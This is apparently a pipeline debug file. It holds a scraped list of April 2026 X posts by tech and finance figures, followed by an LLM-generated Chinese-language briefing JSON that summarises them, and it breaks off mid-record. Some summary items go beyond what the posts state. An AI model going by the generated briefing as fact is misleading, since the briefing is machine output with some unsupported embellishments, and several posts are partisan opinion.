𝘫𝘶𝘴𝘵 𝘤𝘳𝘦𝘢𝘵𝘦𝘥 𝘢 𝘸𝘩𝘰𝘭𝘦 𝘨𝘦𝘯𝘦𝘳𝘢𝘵𝘪𝘰𝘯 𝘰𝘧 𝘷𝘪𝘣𝘦 𝘤𝘰𝘥𝘦𝘳𝘴 𝘸𝘩𝘰 𝘥𝘰𝘯’𝘵.\n\nAnd we now have a legion of synthetic coding agents (like Cursor) that also apparently don’t always follow this basic princ", "url": "https://x.com/GaryMarcus/status/2048593283639894520"}, {"handle": "pmarca", "name": "Marc Andreessen", "published_at": "2026-04-27T02:34:50+00:00", "title": "👀", "url": "https://x.com/pmarca/status/2048591674688037210"}, {"handle": "elonmusk", "name": "Elon Musk", "published_at": "2026-04-27T02:26:57+00:00", "title": "Curiosity & adventure are my philosophy\n\nhttps://grok.com/share/bGVnYWN5_d70e0164-cced-4096-99cb-38604067aa7a", "url": "https://x.com/elonmusk/status/2048589691054694406"}, {"handle": "GaryMarcus", "name": "Gary Marcus", "published_at": "2026-04-27T02:25:10+00:00", "title": "RT by @GaryMarcus: “fails less often than a human does” is a terrible metric. \n \nWe build deterministic software and test it to destruction to ensure it’s 99.99999 reliable . That’s been the basis of every critical application such as accounting payroll and logistics. \n\nLLMs can", "url": "https://x.com/GaryMarcus/status/2048589239915577837"}, {"handle": "pmarca", "name": "Marc Andreessen", "published_at": "2026-04-27T02:25:08+00:00", "title": "Overheard in Silicon Valley: \"Did a Claw post this?\"", "url": "https://x.com/pmarca/status/2048589233095643240"}, {"handle": "GaryMarcus", "name": "Gary Marcus", "published_at": "2026-04-27T01:59:04+00:00", "title": "RT by @GaryMarcus: the beauty of a jagged frontier\nis that every failure is the user's fault\nand every breakthrough is the model's glory", "url": "https://x.com/GaryMarcus/status/2048582672163995766"}, {"handle": "jason", "name": "Jason Calacanis", "published_at": "2026-04-27T01:51:02+00:00", "title": "Incredible writing from @euphoriaHBO", "url": "https://x.com/jason/status/2048580651985604783"}, {"handle": "GaryMarcus", "name": "Gary Marcus", "published_at": "2026-04-27T01:48:56+00:00", "title": "RT by @GaryMarcus: I mean AI influencers here and everywhere are screaming you shouldn't get hired if you don't use agentic AI because you're deliberatly slowing everyone down and the moment something goes wrong it's your fault because you didn't understand the tool?", "url": "https://x.com/GaryMarcus/status/2048580122521780676"}, {"handle": "GaryMarcus", "name": "Gary Marcus", "published_at": "2026-04-27T01:44:47+00:00", "title": "RT by @GaryMarcus: The only AGI that Sam Altman is after is Adjusted Gross Income.", "url": "https://x.com/GaryMarcus/status/2048579079121555764"}, {"handle": "GaryMarcus", "name": "Gary Marcus", "published_at": "2026-04-27T01:40:43+00:00", "title": "the difference is that we don’t *hype* giving 12 year-olds bulldozers.\n\n*of course* it’s a kind of user error when a model destroys all of user’s data and they didn’t have a backup. that’s the point.\n\nvibe coding without considerable experience is like driving without a license.", "url": "https://x.com/GaryMarcus/status/2048578055283880296"}, {"handle": "pmarca", "name": "Marc Andreessen", "published_at": "2026-04-27T01:20:46+00:00", "title": "Overheard in Silicon Valley: \"Now, software is just the prompt for the next version of the software.\"", "url": "https://x.com/pmarca/status/2048573035616375134"}, {"handle": "GaryMarcus", "name": "Gary Marcus", "published_at": "2026-04-27T01:09:02+00:00", "title": "RT by @GaryMarcus: Never ever use generative AI for anything critical. \n\nThe technology is probablistic all the way down and therefore inherently unreliable. \n\nWhy is this so hard to understand? \n\nIt’s wild how many seemingly smart people have drunk the cool aid on this.", "url": "https://x.com/GaryMarcus/status/2048570082843082905"}, {"handle": "GaryMarcus", "name": "Gary Marcus", "published_at": "2026-04-27T01:00:07+00:00", "title": "Generative AI as the Hindenberg", "url": "https://x.com/GaryMarcus/status/2048567837221089669"}, {"handle": "GaryMarcus", "name": "Gary Marcus", "published_at": "2026-04-27T00:25:00+00:00", "title": "Is it me or X starting to look like a vibe coded mess?\n\nPolls are broken.\n\nAccounts are getting hacked.\n\nMy DMs are full of phishing scams.\n\nBasics that used to work no longer work.", "url": "https://x.com/GaryMarcus/status/2048558998325166498"}, {"handle": "sama", "name": "Sam Altman", "published_at": "2026-04-27T00:05:31+00:00", "title": "so fun to see the reception to 5.5!\n\nthere is almost nothing that feels more gratifying to me than builders saying they find our tools useful.", "url": "https://x.com/sama/status/2048554097985593849"}, {"handle": "GaryMarcus", "name": "Gary Marcus", "published_at": "2026-04-27T00:02:43+00:00", "title": "R to @GaryMarcus: btw polling software is broken! votes aren’t showing, as many folks have noted. eg I see none:", "url": "https://x.com/GaryMarcus/status/2048553390540734479"}, {"handle": "GaryMarcus", "name": "Gary Marcus", "published_at": "2026-04-27T00:00:53+00:00", "title": "Total AI disaster, totally predictable", "url": "https://x.com/GaryMarcus/status/2048552931923013916"}, {"handle": "sama", "name": "Sam Altman", "published_at": "2026-04-26T23:59:53+00:00", "title": "Our Principles:\n\nDemocratization, Empowerment, Universal Prosperity, Resilience, and Adaptability\n\nhttps://openai.com/index/our-principles/", "url": "https://x.com/sama/status/2048552677433643427"}, {"handle": "elonmusk", "name": "Elon Musk", "published_at": "2026-04-26T23:22:48+00:00", "title": "Remember this", "url": "https://x.com/elonmusk/status/2048543344746250466"}, {"handle": "elonmusk", "name": "Elon Musk", "published_at": "2026-04-26T22:50:49+00:00", "title": "Grad school indoctrination camps", "url": "https://x.com/elonmusk/status/2048535299102265720"}, {"handle": "HarryStebbings", "name": "Harry Stebbings", "published_at": "2026-04-26T22:34:46+00:00", "title": "We hired someone for the investing team. \n\nSomething I never planned to do. \n\nThey sent the team 3 new deals per day for 90 days straight. \n\nAll aligned to our stage, geography and deal type. \n\nThat’s how you hustle and get a job in VC. \n\nStay tuned. Reveal to come.", "url": "https://x.com/HarryStebbings/status/2048531257399664920"}, {"handle": "pmarca", "name": "Marc Andreessen", "published_at": "2026-04-26T21:32:43+00:00", "title": "Many such cases.", "url": "https://x.com/pmarca/status/2048515643268567431"}, {"handle": "elonmusk", "name": "Elon Musk", "published_at": "2026-04-26T21:21:33+00:00", "title": "RT by @elonmusk: 🚨BREAKING: I found Cole Allen's archived tweets.\n\nHe predicted \"Kamala wins all swing states,\" compared Trump's win to “Nazis getting elected,” and moved to Bluesky.\n\nThe scary part: he retweeted every mainstream Democrat on this platform.\n\nThread below. 👇\n\nWhat ", "url": "https://x.com/elonmusk/status/2048512831692452091"}, {"handle": "DavidSacks", "name": "David Sacks", "published_at": "2026-04-26T20:42:24+00:00", "title": "MSM hoax factories like the Atlantic love to allege conflicts of interest without ever disclosing their own.", "url": "https://x.com/DavidSacks/status/2048502978626113625"}, {"handle": "jason", "name": "Jason Calacanis", "published_at": "2026-04-26T19:42:30+00:00", "title": "I’ve invested in 700 private companies \n\nProviding liquidity and loans to high performing founders is completely standard. \n\nIn fact, investors encourage loans and secondary sales for founders to enable them to go for the Gold — which is exactly what SpaceX has done. \n\nThe @NYTim", "url": "https://x.com/jason/status/2048487905543237675"}, {"handle": "HarryStebbings", "name": "Harry Stebbings", "published_at": "2026-04-26T19:35:39+00:00", "title": "I have interviewed 1,000 of the best CEOs of the last 10 years. \n\nAdam Foroughi, Founder @AppLovin is easily top 3, ever. \n\n$160BN Market Cap \n\n$5.48BN Revenue\n\n$10M EBITDA per head \n\n82%+ margins\n\nJust 450 people in core business 🤯 \n\nNo other business on the planet has numbers l", "url": "https://x.com/HarryStebbings/status/2048486182904852537"}, {"handle": "ylecun", "name": "Yann LeCun", "published_at": "2026-04-26T18:31:11+00:00", "title": "RT by @ylecun: Republicans have been making this argument my entire life. We had 8 years of Clinton, 8 years of Obama, 4 years of Biden— never became a socialism. But you know what we got? More jobs, lower unemployment, higher GDP in Democratic administrations than every GOP admi", "url": "https://x.com/ylecun/status/2048469956627468510"}, {"handle": "jason", "name": "Jason Calacanis", "published_at": "2026-04-26T18:14:04+00:00", "title": "Ok @Acosta, balls in your court", "url": "https://x.com/jason/status/2048465651723882972"}, {"handle": "jason", "name": "Jason Calacanis", "published_at": "2026-04-26T18:05:09+00:00", "title": "The NYTimes focus last week was micro-looting, social murder and meaningless private company transactions designed to ferment class warfare.\n\nDisgraziad", "url": "https://x.com/jason/status/2048463405590225173"}, {"handle": "DavidSacks", "name": "David Sacks", "published_at": "2026-04-26T17:37:26+00:00", "title": "RT by @DavidSacks: Accurate", "url": "https://x.com/DavidSacks/status/2048456433981591867"}, {"handle": "ylecun", "name": "Yann LeCun", "published_at": "2026-04-26T17:27:23+00:00", "title": "RT by @ylecun: Trump just fired all 24 members of the National Science Board. Every single one. By email. No warning. No reason given. The board has existed since 1950.\n\nThe National Science Board is the independent body that oversees the National Science Foundation, the agency t", "url": "https://x.com/ylecun/status/2048453901930660058"}, {"handle": "jason", "name": "Jason Calacanis", "published_at": "2026-04-26T17:13:01+00:00", "title": "Who made this?!", "url": "https://x.com/jason/status/2048450286902235560"}, {"handle": "jason", "name": "Jason Calacanis", "published_at": "2026-04-26T16:21:34+00:00", "title": "I’m proud to announce I’m hosting an exhibition cage match between @Acosta and @mtracey on July 4th \n\n$100,000 cash prize \n\nVegas \n\n3, 3 minute rounds", "url": "https://x.com/jason/status/2048437340218044499"}, {"handle": "charliebilello", "name": "Charlie Bilello", "published_at": "2026-04-26T16:18:48+00:00", "title": "RT by @charliebilello: Does a government shutdown negatively impact the stock market?\n\nNo.\n\nThe S&P 500 has gained an average of 0.4% during prior shutdowns and is up 4.8% during the current shutdown which is the longest in history at 70 days and counting.\n\n$SPX", "url": "https://x.com/charliebilello/status/2048436641451155650"}, {"handle": "jason", "name": "Jason Calacanis", "published_at": "2026-04-26T16:16:34+00:00", "title": "Once again, the substack party result in a Donnybrook — it’s like the source awards for wordmaxxers", "url": "https://x.com/jason/status/2048436081725464959"}, {"handle": "elonmusk", "name": "Elon Musk", "published_at": "2026-04-26T16:14:38+00:00", "title": "RT by @elonmusk: 25% of very liberal people say political violence can “sometimes be justified.”\n\nAmong very conservative people it’s just 3%.\n\nIn other words, the far left is 8x more likely to support political violence as the far right.\n\nStop pretending this is a “both sides” p", "url": "https://x.com/elonmusk/status/2048435593244237849"}, {"handle": "ylecun", "name": "Yann LeCun", "published_at": "2026-04-26T16:03:04+00:00", "title": "RT by @ylecun: Existential risk mongers are a small, very vocal cult with a lot of very clever online astroturfing skills. \n\nPoliticians never waste a good fake crisis, which is why they're perfect for Bernie to try to seize the means of production back from the private sphere.\n\n", "url": "https://x.com/ylecun/status/2048432684930654430"}, {"handle": "sama", "name": "Sam Altman", "published_at": "2026-04-26T15:46:41+00:00", "title": "feels like a good time to seriously rethink how operating systems and user interfaces are designed\n\n(also the internet; there should be a protocol that is equally usable by people and agents)", "url": "https://x.com/sama/status/2048428561481265539"}, {"handle": "sama", "name": "Sam Altman", "published_at": "2026-04-26T15:37:00+00:00", "title": "\"post-AGI, no one is going to work and the economy is going to collapse\"\n\n\"i am switching to polyphasic sleep because GPT-5.5 in codex is so good that i can't afford to be sleeping for such long stretches and miss out on working\"", "url": "https://x.com/sama/status/2048426122854228141"}, {"handle": "charliebilello", "name": "Charlie Bilello", "published_at": "2026-04-26T15:10:21+00:00", "title": "RT by @charliebilello: The 12.5% gain in the S&P 500 over the last 4 weeks was the 20th biggest 4-week advance for the index since 1950. $SPX\n\nVideo: https://www.youtube.com/watch?v=p5e0ThPjIAg&t=646s", "url": "https://x.com/charliebilello/status/2048419415222259820"}, {"handle": "HarryStebbings", "name": "Harry Stebbings", "published_at": "2026-04-26T15:07:55+00:00", "title": "Seeing two types of founders emerge in this moment:\n\nThe tourists and the terminators. \n\nThe terminators are salivating at the opportunity ahead. Hungrier than ever. More ambitious than ever. They want it more than ever. \n\nThe tourists. They want to sell. They are scared. They do", "url": "https://x.com/HarryStebbings/status/2048418806867870115"}, {"handle": "DavidSacks", "name": "David Sacks", "published_at": "2026-04-26T15:03:35+00:00", "title": "RT by @DavidSacks: Cole Allen, the gunman from last night’s WH Correspondents Dinner, maintained an active online presence, especially on the leftwing social media platform Bluesky where he went by the handle http://ColdForce.bsky.social with multiple references violence and guns", "url": "https://x.com/DavidSacks/status/2048417712439689346"}, {"handle": "paulg", "name": "Paul Graham", "published_at": "2026-04-26T14:48:06+00:00", "title": "RT by @paulg: Yeah okay, Lego bros, brodettes and brotheys are cooked with this one.\n\nGPT 2 Image can create full Lego sets! With actual Bricklink IDs so you can order the parts and build it.\n\nWhole new business opportunity here for the taking.", "url": "https://x.com/paulg/status/2048413815675539816"}, {"handle": "paulg", "name": "Paul Graham", "published_at": "2026-04-26T14:47:09+00:00", "title": "Every post, I block and report a couple accounts using AI-generated replies. It feels much the same as picking up litter on a city street; I don't know if it has any effect, but it feels like I ought to at least try to keep the site clean.", "url": "https://x.com/paulg/status/2048413578789634100"}, {"handle": "paulg", "name": "Paul Graham", "published_at": "2026-04-26T14:40:28+00:00", "title": "Durer was the original Dr Seuss.", "url": "https://x.com/paulg/status/2048411898081583547"}, {"handle": "paulg", "name": "Paul Graham", "published_at": "2026-04-26T14:36:59+00:00", "title": "Writing a talk to give in Stockholm. The prospect of speaking to a large group of people is no longer frightening, but writing a talk is as much work as ever. I'm no longer afraid of audiences, but I'm still just as afraid of making mistakes.", "url": "https://x.com/paulg/status/2048411021329453562"}, {"handle": "charliebilello", "name": "Charlie Bilello", "published_at": "2026-04-26T14:19:13+00:00", "title": "RT by @charliebilello: The stock market is at an all-time high.\n\nCredit spreads are near all-time lows.\n\nAnd inflation has been above the Fed's target level for 61 consecutive months, averaging 4% per year since 2019.\n\nSo why is the Fed expanding its balance sheet (QE)?\n\nVideo: h", "url": "https://x.com/charliebilello/status/2048406550897729561"}, {"handle": "charliebilello", "name": "Charlie Bilello", "published_at": "2026-04-26T14:00:02+00:00", "title": "RT by @charliebilello: On March 30, the S&P 500 was down 7% in 2026, the 12th worst start to a year in history. After one of the biggest 4-week rallies ever, it's now up +5% YTD and above the average year at this point in time (+3%). There is no impossible in markets.\n\nVideo: htt", "url": "https://x.com/charliebilello/status/2048401720540061794"}, {"handle": "HarryStebbings", "name": "Harry Stebbings", "published_at": "2026-04-26T13:56:31+00:00", "title": "The best founders I know all text their investors. \n\nNone of them email them. \n\nThe relationship will blossom and deepen in a matter of messages.", "url": "https://x.com/HarryStebbings/status/2048400836024283246"}, {"handle": "jason", "name": "Jason Calacanis", "published_at": "2026-04-26T13:51:54+00:00", "title": "RT by @Jason: Random pic of @Jason protecting our $TAO bags", "url": "https://x.com/jason/status/2048399674269213067"}, {"handle": "ylecun", "name": "Yann LeCun", "published_at": "2026-04-26T13:51:41+00:00", "title": "Shooting oneself in the foot?\nNope.\nShooting oneself in the prefrontal cortex.", "url": "https://x.com/ylecun/status/2048399621492236615"}, {"handle": "charliebilello", "name": "Charlie Bilello", "published_at": "2026-04-26T13:45:00+00:00", "title": "RT by @charliebilello: Global Inflation Rates are on the RISE...\n\nVideo: https://www.youtube.com/watch?v=p5e0ThPjIAg&t=1433s", "url": "https://x.com/charliebilello/status/2048397937156518387"}, {"handle": "paulg", "name": "Paul Graham", "published_at": "2026-04-26T13:37:21+00:00", "title": "RT by @paulg: 'Action is now needed': Over 60 ex-U.K. ambassadors call to sanction Israel over West Bank\nhttps://www.haaretz.com/west-bank/2026-04-26/ty-article/.premium/over-60-ex-uk-ambassadors-call-to-sanction-israel-over-west-bank/0000019d-c950-d11b-a7df-ef5a5fba0000", "url": "https://x.com/paulg/status/2048396013816152216"}, {"handle": "charliebilello", "name": "Charlie Bilello", "published_at": "2026-04-26T13:30:00+00:00", "title": "RT by @charliebilello: With the exception of Bitcoin, every major asset class is now in positive territory on the year...\n\nVideo: https://www.youtube.com/watch?v=p5e0ThPjIAg&t=973s", "url": "https://x.com/charliebilello/status/2048394162366533935"}, {"handle": "charliebilello", "name": "Charlie Bilello", "published_at": "2026-04-26T13:14:49+00:00", "title": "RT by @charliebilello: The S&P 500 ended the week at another all-time high, its 9th of the year. $SPX\n\nVideo: https://www.youtube.com/watch?v=p5e0ThPjIAg&t=646s", "url": "https://x.com/charliebilello/status/2048390341221404827"}, {"handle": "paulg", "name": "Paul Graham", "published_at": "2026-04-26T11:57:10+00:00", "title": "Good use of camouflage by Biscuit.", "url": "https://x.com/paulg/status/2048370801833828507"}, {"handle": "JeffDean", "name": "Jeff Dean", "published_at": "2026-04-26T10:41:25+00:00", "title": "RT by @JeffDean: THE FIRST MAN IN HISTORY TO BREAK 2 HOURS IN A MARATHON!!!🤯🤯🤯\n\nSabastian Sawe 🇰🇪 has just shattered the World Record at the London Marathon, running 1:59:30!!!\n\nHe makes history as the first man to officially break 2 hours in the marathon.\n\nYomif Kejelcha 🇪🇹 in h", "url": "https://x.com/JeffDean/status/2048351736037826877"}, {"handle": "ylecun", "name": "Yann LeCun", "published_at": "2026-04-26T06:48:29+00:00", "title": "RT by @ylecun: Never let critical thinking get in the way of extremist fantasy stories.\n\nIf you're on either side of this slider, congratulations, you may be a child in an adult costume body!\n\nBlack and white thinking is for children. \n\nWhen you become an adult it's time to put a", "url": "https://x.com/ylecun/status/2048293118781296734"}, {"handle": "jason", "name": "Jason Calacanis", "published_at": "2026-04-26T03:57:07+00:00", "title": "The left has a serious violence problem, which @DavidSacks called out early and often. \n\nThis generation of woke democratic socialists are morally bankrupt. \n\nThey believe in looting and violence as a political tool — and they’re vocal about it. \n\nIf you called out the violent me", "url": "https://x.com/jason/status/2048249992163242220"}, {"handle": "jason", "name": "Jason Calacanis", "published_at": "2026-04-26T03:46:17+00:00", "title": "If you’re not condemning these lunatics, you’re advocating for the end of the American empire. \n\nI’m not for canceling people, but the fact the @nytimes and @newyorker not only employees these individuals, but selects them to represent their brands, shows exactly how bankrupt the", "url": "https://x.com/jason/status/2048247267182658004"}] diff --git a/data/x_brief/debug/20260428_011513_l1_stage2_output.json b/data/x_brief/debug/20260428_011513_l1_stage2_output.json new file mode 100644 index 0000000..12ac86d --- /dev/null +++ b/data/x_brief/debug/20260428_011513_l1_stage2_output.json @@ -0,0 +1,207 @@ +{ + "raw_text": "\n\n{\"themes\":[{\"id\":\"t1\",\"title\":\"Sam Altman:重新思考操作系统和UI设计\",\"subtitle\":\"Altman暗示AI将改变人机交互范式\",\"bullets\":[\"微软仍是主要云伙伴,但OpenAI产品将可在所有云上使用\",\"认为现在是认真重新思考操作系统和用户界面设计的好时机\",\"提出应有一个人类和AI代理都能使用的协议\"],\"samples\":[{\"text\":\"feels like a good time to seriously rethink how operating systems and user interfaces are designed\\n\\n(also the internet; there should be a protocol that is equally usable by people and agents)\",\"url\":\"https://x.com/sama/status/2048428561481265539\",\"handle\":\"sama\",\"date\":\"2026-04-26\"},{\"text\":\"we have updated our partnership with microsoft.\\n\\nmicrosoft will remain our primary cloud partner, but we are now able to make our products and services available across all clouds.\\n\\nwill continue to provide them with models and products until 2032, and a revenue share through 203\",\"url\":\"https://x.com/sama/status/2048755148361707946\",\"handle\":\"sama\",\"date\":\"2026-04-27\"}]},{\"id\":\"t2\",\"title\":\"AI-native工程团队的工作方式演进\",\"subtitle\":\"Andrew Ng深度分析AI编程带来的变化\",\"bullets\":[\"AI-native团队使用编码代理构建产品速度更快\",\"不仅改变开发速度,还改变了团队运营方式\",\"高质量工程师角色转变为更多监督和审查\"],\"samples\":[{\"text\":\"AI-native software engineering teams operate very differently than traditional teams. The obvious difference is that AI-native teams use coding agents to build products much faster, but this leads to many other changes in how we operate. For example, some great engineers now play\",\"url\":\"https://x.com/AndrewYNg/status/2048793852702757151\",\"handle\":\"AndrewYNg\",\"date\":\"2026-04-27\"}]},{\"id\":\"t3\",\"title\":\"宏观叙事:美股估值与央行政策\",\"subtitle\":\"Charlie Bilello警示市场信号\",\"bullets\":[\"S&P 500的CAPE比率升至41,创2000年以来最高,超过99%历史估值\",\"美联储扩张资产负债表(QE),但市场仍创新高\",\"2026年跟随2025剧本,交易员对极端言论免疫,更自信抄底\"],\"samples\":[{\"text\":\"The S&P 500's CAPE Ratio has moved up to 41, its highest level since 2000 and now above 99% of historical valuations. $SPX\",\"url\":\"https://x.com/charliebilello/status/2048753179471323584\",\"handle\":\"charliebilello\",\"date\":\"2026-04-27\"},{\"text\":\"2026 is following the same playbook as 2025. Only difference is traders have become much more immune to extreme rhetoric and have been more confident in buying the dip, sending the stock market quickly back to new all-time highs. $SPX\",\"url\":\"https://x.com/charliebilello/status/2048761760971096534\",\"handle\":\"charliebilello\",\"date\":\"2026-04-27\"}]}],\"p0_events\":[{\"id\":\"p01\",\"title\":\"OpenAI与微软更新合作\",\"meta\":\"2026-04-27 | @sama\",\"summary\":\"微软仍为主要云伙伴,OpenAI产品可跨所有云使用,合作延续至2032年\",\"url\":\"https://x.com/sama/status/2048755148361707946\"},{\"id\":\"p02\",\"title\":\"AI-native软件工程团队运作差异\",\"meta\":\"2026-04-27 | @AndrewYNg\",\"summary\":\"AI团队使用编码代理构建产品更快,运营方式发生根本变化\",\"url\":\"https://x.com/AndrewYNg/status/2048793852702757151\"},{\"id\":\"p03\",\"title\":\"S&P 500 CAPE比率创2000年来新高\",\"meta\":\"2026-04-27 | @charliebilello\",\"summary\":\"估值达41,超过99%历史水平,央行QE持续但市场无视风险\",\"url\":\"https://x.com/charliebilello/status/2048753179471323584\"},{\"id\":\"p04\",\"title\":\"GPT-5.5成为Perplexity默认编排模型\",\"meta\":\"2026-04-24 | @AravSrinivas\",\"summary\":\"用户消耗更少算力 credits,可运行更多任务\",\"url\":\"https://x.com/AravSrinivas/status/2047788775468908840\"},{\"id\":\"p05\",\"title\":\"Paul Graham:初创公司不必担心被模型公司吞噬\",\"meta\":\"2026-04-27 | @paulg\",\"summary\":\"担心被模型公司吃掉就像担心成为明星后生活受限\",\"url\":\"https://x.com/paulg/status/2048677984106664227\"},{\"id\":\"p06\",\"title\":\"Marc Andreessen:软件即提示\",\"meta\":\"2026-04-27 | @pmarca\",\"summary\":\"软件只是下一个版本软件的提示\",\"url\":\"https://x.com/pmarca/status/2048573035616375134\"}],\"top_quotes\":[{\"id\":\"q1\",\"quote\":\"feels like a good time to seriously rethink how operating systems and user interfaces are designed\",\"speaker\":\"Sam Altman\",\"date\":\"2026-04-26\",\"note\":\"暗示AI将重塑人机交互范式,提议建立人与代理均可使用的协议\",\"url\":\"https://x.com/sama/status/2048428561481265539\"},{\"id\":\"q2\",\"quote\":\"When one thing becomes abundant and cheap, another thing becomes scarce and valuable.\",\"speaker\":\"Marc Andreessen\",\"date\":\"2026-04-27\",\"note\":\"一句话道出AI时代的价值转移逻辑\",\"url\":\"https://x.com/pmarca/status/2048624098398650608\"},{\"id\":\"q3\",\"quote\":\"Worrying that your startup will be eaten by the model companies is like worrying that your life will be constrained after you become a movie star. You're far more likely simply to fail.\",\"speaker\":\"Paul Graham\",\"date\":\"2026-04-27\",\"note\":\"对AI焦虑的经典回应\",\"url\":\"https://x.com/paulg/status/2048677984106664227\"}],\"category_updates\":[{\"id\":\"c1\",\"title\":\"AI模型进展\",\"subtitle\":\"行业持续快速迭代\",\"level\":\"P0\",\"items\":[{\"text\":\"GPT-5.5发布反响热烈\",\"url\":\"https://x.com/sama/status/2048554097985593849\"},{\"text\":\"Perplexity默认模型切换至GPT-5.5\",\"url\":\"https://x.com/AravSrinivas/status/2047753276888854595\"}]},{\"id\":\"c2\",\"title\":\"AI编程工具\",\"subtitle\":\"编码代理实战表现\",\"level\":\"P0\",\"items\":[{\"text\":\"Codex在企业内部部署效果显著\",\"url\":\"https://x.com/sama/status/2048165186482389253\"},{\"text\":\"研究人员让GPT-5.5独立运行实验\",\"url\":\"https://x.com/sama/status/2047386955550470245\"}]},{\"id\":\"c3\",\"title\":\"宏观市场\",\"subtitle\":\"美股风险信号积累\",\"level\":\"P1\",\"items\":[{\"text\":\"CAPE估值创25年新高\",\"url\":\"https://x.com/charliebilello/status/2048753179471323584\"},{\"text\":\"通胀持续高于美联储目标61个月\",\"url\":\"https://x.com/charliebilello/status/2048406550897729561\"}]},{\"id\":\"c4\",\"title\":\"AI安全与批评\",\"subtitle\":\"GaryMarcus持续警示\",\"level\":\"P2\",\"items\":[{\"text\":\"AI代理是过早技术,推广太快\",\"url\":\"https://x.com/GaryMarcus/status/2048757233174122827\"},{\"text\":\"vibe coding一代不懂备份\",\"url\":\"https://x.com/GaryMarcus/status/2048593283639894520\"}]},{\"id\":\"c5\",\"title\":\"VC视角\",\"subtitle\":\"行业方向判断\",\"level\":\"P1\",\"items\":[{\"text\":\"Paul Graham淡化AI焦虑\",\"url\":\"https://x.com/paulg/status/2048677984106664227\"},{\"text\":\"Marc Andreessen谈资源稀缺性\",\"url\":\"https://x.com/pmarca/status/2048624098398650608\"}]},{\"id\":\"c6\",\"title\":\"华语圈\",\"subtitle\":\"待采集\",\"level\":\"P2\",\"items\":[{\"text\":\"中文账号需X API获取,暂无可用数据\",\"url\":\"\"}]}],\"risk_signals\":[{\"id\":\"r1\",\"level\":\"HIGH\",\"title\":\"美股估值极端化\",\"detail\":\"CAPE比率41创25年新高,超过99%历史水平,但美联储仍在QE,市场过于乐观\"},{\"id\":\"r2\",\"level\":\"MID\",\"title\":\"AI代理安全隐患\",\"detail\":\"GaryMarcus指出vibe-coded AI代理频繁造成数据丢失,用户缺乏必要的技术经验\"},{\"id\":\"r3\",\"level\":\"OPP\",\"title\":\"AI编程效率提升显著\",\"detail\":\"研究人员可让GPT-5.5独立运行实验vernight,构建效率大幅提升,验证了Andrew Ng的观点\"}]}", + "parsed_modules": { + "themes": [ + { + "id": "t1", + "title": "Sam Altman:重新思考操作系统和UI设计", + "subtitle": "Altman暗示AI将改变人机交互范式", + "bullets": [ + "微软仍是主要云伙伴,但OpenAI产品将可在所有云上使用", + "认为现在是认真重新思考操作系统和用户界面设计的好时机", + "提出应有一个人类和AI代理都能使用的协议" + ], + "samples": [ + { + "text": "feels like a good time to seriously rethink how operating systems and user interfaces are designed\n\n(also the internet; there should be a protocol that is equally usable by people and agents)", + "url": "https://x.com/sama/status/2048428561481265539", + "handle": "sama", + "date": "2026-04-26" + }, + { + "text": "we have updated our partnership with microsoft.\n\nmicrosoft will remain our primary cloud partner, but we are now able to make our products and services available across all clouds.\n\nwill continue to provide them with models and products until 2032, and a revenue share through 203", + "url": "https://x.com/sama/status/2048755148361707946", + "handle": "sama", + "date": "2026-04-27" + } + ] + }, + { + "id": "t2", + "title": "AI-native工程团队的工作方式演进", + "subtitle": "Andrew Ng深度分析AI编程带来的变化", + "bullets": [ + "AI-native团队使用编码代理构建产品速度更快", + "不仅改变开发速度,还改变了团队运营方式", + "高质量工程师角色转变为更多监督和审查" + ], + "samples": [ + { + "text": "AI-native software engineering teams operate very differently than traditional teams. The obvious difference is that AI-native teams use coding agents to build products much faster, but this leads to many other changes in how we operate. For example, some great engineers now play", + "url": "https://x.com/AndrewYNg/status/2048793852702757151", + "handle": "AndrewYNg", + "date": "2026-04-27" + } + ] + }, + { + "id": "t3", + "title": "宏观叙事:美股估值与央行政策", + "subtitle": "Charlie Bilello警示市场信号", + "bullets": [ + "S&P 500的CAPE比率升至41,创2000年以来最高,超过99%历史估值", + "美联储扩张资产负债表(QE),但市场仍创新高", + "2026年跟随2025剧本,交易员对极端言论免疫,更自信抄底" + ], + "samples": [ + { + "text": "The S&P 500's CAPE Ratio has moved up to 41, its highest level since 2000 and now above 99% of historical valuations. $SPX", + "url": "https://x.com/charliebilello/status/2048753179471323584", + "handle": "charliebilello", + "date": "2026-04-27" + }, + { + "text": "2026 is following the same playbook as 2025. Only difference is traders have become much more immune to extreme rhetoric and have been more confident in buying the dip, sending the stock market quickly back to new all-time highs. $SPX", + "url": "https://x.com/charliebilello/status/2048761760971096534", + "handle": "charliebilello", + "date": "2026-04-27" + } + ] + } + ], + "p0_events": [ + { + "id": "p04", + "title": "GPT-5.5成为Perplexity默认编排模型", + "meta": "2026-04-24 | @AravSrinivas", + "summary": "用户消耗更少算力 credits,可运行更多任务", + "url": "https://x.com/AravSrinivas/status/2047788775468908840" + }, + { + "id": "p05", + "title": "Paul Graham:初创公司不必担心被模型公司吞噬", + "meta": "2026-04-27 | @paulg", + "summary": "担心被模型公司吃掉就像担心成为明星后生活受限", + "url": "https://x.com/paulg/status/2048677984106664227" + }, + { + "id": "p06", + "title": "Marc Andreessen:软件即提示", + "meta": "2026-04-27 | @pmarca", + "summary": "软件只是下一个版本软件的提示", + "url": "https://x.com/pmarca/status/2048573035616375134" + } + ], + "top_quotes": [ + { + "id": "q2", + "quote": "When one thing becomes abundant and cheap, another thing becomes scarce and valuable.", + "speaker": "Marc Andreessen", + "date": "2026-04-27", + "note": "一句话道出AI时代的价值转移逻辑", + "url": "https://x.com/pmarca/status/2048624098398650608" + } + ], + "category_updates": [ + { + "id": "c1", + "title": "AI模型进展", + "subtitle": "行业持续快速迭代", + "level": "P0", + "items": [ + { + "text": "GPT-5.5发布反响热烈", + "url": "https://x.com/sama/status/2048554097985593849" + }, + { + "text": "Perplexity默认模型切换至GPT-5.5", + "url": "https://x.com/AravSrinivas/status/2047753276888854595" + } + ] + }, + { + "id": "c2", + "title": "AI编程工具", + "subtitle": "编码代理实战表现", + "level": "P0", + "items": [ + { + "text": "Codex在企业内部部署效果显著", + "url": "https://x.com/sama/status/2048165186482389253" + }, + { + "text": "研究人员让GPT-5.5独立运行实验", + "url": "https://x.com/sama/status/2047386955550470245" + } + ] + }, + { + "id": "c3", + "title": "宏观市场", + "subtitle": "美股风险信号积累", + "level": "P1", + "items": [ + { + "text": "通胀持续高于美联储目标61个月", + "url": "https://x.com/charliebilello/status/2048406550897729561" + } + ] + }, + { + "id": "c4", + "title": "AI安全与批评", + "subtitle": "GaryMarcus持续警示", + "level": "P2", + "items": [ + { + "text": "AI代理是过早技术,推广太快", + "url": "https://x.com/GaryMarcus/status/2048757233174122827" + }, + { + "text": "vibe coding一代不懂备份", + 